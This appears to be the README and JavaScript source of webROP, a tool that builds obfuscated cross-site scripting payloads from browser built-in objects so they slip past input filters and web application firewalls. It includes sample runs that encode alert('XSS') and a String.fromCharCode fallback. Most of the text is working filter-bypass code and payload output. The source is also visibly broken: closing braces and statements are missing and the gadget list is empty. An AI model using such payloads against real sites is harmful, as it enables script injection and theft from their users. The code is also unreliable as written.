webROP is testing the security of input validation filters and web application firewalls.
It is using so called webROP gadgets which are reusable elements supplied by the default browser configuration.
It can generate payloads like this one:
webROP[katharsis] $ ./webrop -vp 'alert("XSS")'
webROP v0.8 [832 gadgets available]
"a" => (Ink+[])[19]
"l" => (File+[])[11]
"e" => (Ink+[])[23]
"r" => (Attr+[])[12]
"t" => (Ink+[])[4]
"(" => (Ink+[])[12]
""" => (decodeURIComponent((encodeURIComponent(2e24)+[])[2]+22)[0])
"X" => (CSSSkewX+[])[16]
"S" => (Set+[])[9]
"S" => (Set+[])[9]
""" => (decodeURIComponent((encodeURIComponent(2e24)+[])[2]+22)[0])
")" => (Ink+[])[13]
// alert("XSS") - 255 bytes
It will focus on the most performant combinations and allow an infite range of characters by using webROP eggs. When no eggs are available, it will use the wildcard eggs to construct a String.fromCharCode()
object as fallback:
webROP[katharsis] $ ./webrop -vp "_{~}"
webROP v0.8 [832 gadgets available]
"S" => (Set+[])[9]
"t" => (Map+[])[4]
"r" => (blur+[])[12]
"i" => (Map+[])[5]
"n" => (Map+[])[2]
"g" => (Range+[])[12]
"." => (1/2+[])[1]
"f" => (Map+[])[0]
"r" => (blur+[])[12]
"o" => (Map+[])[6]
"m" => (Image+[])[10]
"C" => (Cache+[])[9]
"h" => (Cache+[])[12]
"a" => (Map+[])[10]
"r" => (blur+[])[12]
"C" => (Cache+[])[9]
"o" => (Map+[])[6]
"d" => (Map+[])[27]
"e" => (Map+[])[23]
"(" => (Map+[])[12]
"," => (Array(2)+[])
"," => (Array(2)+[])
"," => (Array(2)+[])
")" => (Map+[])[13]
// _{~} - 339 bytes
// webROP
// Web application testing and filtering bypass tool
// © Jean Pereira <counterswarm.de>
const version = 0.8
const readme = `webROP v${version}
Usage: webrop [options]
Required parameters:
-p [payload] Input payload
Optional parameters:
-h Show help
-v Verbose mode
-e Encode payload
-f [filename] Write output to file
-r Randomize payload
-c Capitalize payload
const fs = require('fs')
const arg = require('arg')
let args
try {
args = arg({
'--help': Boolean,
'-h': '--help',
'--random': Boolean,
'-r': '--random',
'--verbose': Boolean,
'-v': '--verbose',
'--capitalize': Boolean,
'-c': '--capitalize',
'--encode': Boolean,
'-e': '--encode',
'--payload': String,
'-p': '--payload',
'--file': String,
'-f': '--file'
} catch(e){
const required = ['--payload']
checkRequiredArgs(args, required)
let ropEggs = [
{list: "(decodeURIComponent((encodeURIComponent(2e24)+[])[2]+60)[0])", source: "`"},
{list: "(decodeURIComponent((encodeURIComponent(2e24)+[])[2]+27)[0])", source: "'"},
{list: "(decodeURIComponent((encodeURIComponent(2e24)+[])[2]+22)[0])", source: "\""},
{list: "(atob(0xB9386F)+[])[5]", source: ";"},
{list: "(atob(0xA93445)+[])[2]", source: "<"},
{list: "(atob(0x2005DD)+[])[2]", source: "|"},
{list: "(atob(0xB5849A)+[])[1]", source: "_"},
{list: "(new CSSKeywordValue(1)+[])[0]", source: "\\"},
{list: "(new CSSMathNegate(1)+[])[5]", source: "-"},
{list: "(Array(2)+[])", source: ","},
{list: "(1/2+[])[1]", source: "."},
{list: "(4e38+[])[2]", source: "+"},
{list: "(btoa(1)+[])[2]", source: "="},
{list: "(unescape(escape(Map)[8]+22))", source: "%"},
{list: "(new RegExp+[])[0]", source: "/"},
{list: "(new RegExp+[])[2]", source: "?"},
{list: "(new RegExp+[])[3]", source: ":"}
if(a('capitalize')) {
ropEggs = [
{list: "(Array(2)+[])", source: ","},
{list: "(1/2+[])[1]", source: "."},
function a(name) {
return args[`--${name}`]
function displayHelp() {
if(a('help')) {
function checkRequiredArgs(args, requiredArgs) {
required.forEach(arg => {
if (!args[arg]) {
function uniqueChars(arr) {
let uniqueChars = new Set()
for (let i = 0; i < arr.length; i++) {
for (let j = 0; j < arr[i].length; j++) {
return JSON.stringify(Array.from(uniqueChars).sort())
function charCodeConverter(str) {
let result
if (typeof str === 'string') {
result = str.split('').map(char => char.charCodeAt(0)).join(',')
} else if (typeof str === 'number') {
result = String.fromCharCode(str)
} else {
result = false
return result
function compareStringToCharArray(str, charArray) {
for (let i = 0; i < str.length; i++) {
if (!charArray.includes(str[i])) {
return false
return true
function getUpperCaseItems(arr) {
return arr.filter(item => {
return item[0] >= 'A' && item[0] <= 'Z'
function findGadgets(originalString, substrings) {
let result = []
let originalStringCopy = originalString
for (let i = 0; i < originalString.length; i++) {
for (let j = 0; j < substrings.length; j++) {
if (substrings[j].indexOf(originalString[i]) !== -1) {
let character = originalString[i]
let position = originalStringCopy.indexOf(character)
originalStringCopy = originalStringCopy.replace(character, '')
arrIndex: j,
substrIndex: substrings[j].indexOf(character),
character: character,
position: position
if (originalStringCopy.length === 0) {
return result
} else {
console.log(`\nNo gadgets found, try different payload`)
function shuffle(arr) {
var j, x, i
for (i = arr.length - 1; i > 0; i--) {
j = Math.floor(Math.random() * (i + 1))
x = arr[i]
arr[i] = arr[j]
arr[j] = x
return arr
var gadgetList = [
gadgetList = shuffle(gadgetList)
if(a('capitalize')) {
gadgetList = getUpperCaseItems(gadgetList)
if(!a('random')) {
gadgetList = gadgetList.sort(function(a, b) {
return a.length - b.length
let gadgetSource = gadgetList.map(x => `function ${x}() { [native code] }`)
for (const {list, source} of ropEggs) {
for (var i = 0; i <= 9; i++) {
console.log(`webROP v${version} [${gadgetList.length} gadgets available]`)
let uniqueCharacters = uniqueChars(gadgetSource)
let inputPayload = ''
let originalPayload = ''
inputPayload = a('payload')
originalPayload = a('payload')
if(!compareStringToCharArray(inputPayload, uniqueCharacters)) {
inputPayload = `String.fromCharCode(${charCodeConverter(inputPayload)})`
var gadgetData = findGadgets(inputPayload, gadgetSource)
if(a('verbose')) { console.log('') }
var gadgetPayload = gadgetData.map(function(gadget) {
if(gadget.character.match(/^(\d+)$/)) {
return gadget.character
else if(gadgetList[gadget.arrIndex].match(/^\(/)) {
if(a('verbose')) { console.log(`"${gadget.character}" => ${gadgetList[gadget.arrIndex]}`) }
return gadgetList[gadget.arrIndex]
else {
if(a('verbose')) { console.log(`"${gadget.character}" => (${gadgetList[gadget.arrIndex]}+[])[${gadget.substrIndex}]`) }
return `(${gadgetList[gadget.arrIndex]}+[])[${gadget.substrIndex}]`
console.log(`\n// ${originalPayload} - ${gadgetPayload.length} bytes`)
if(a('encode')) {
gadgetPayload = encodeURI(gadgetPayload).replace(/\+/g, '%2B')
if(a('file')) {
fs.writeFileSync(a('file'), gadgetPayload)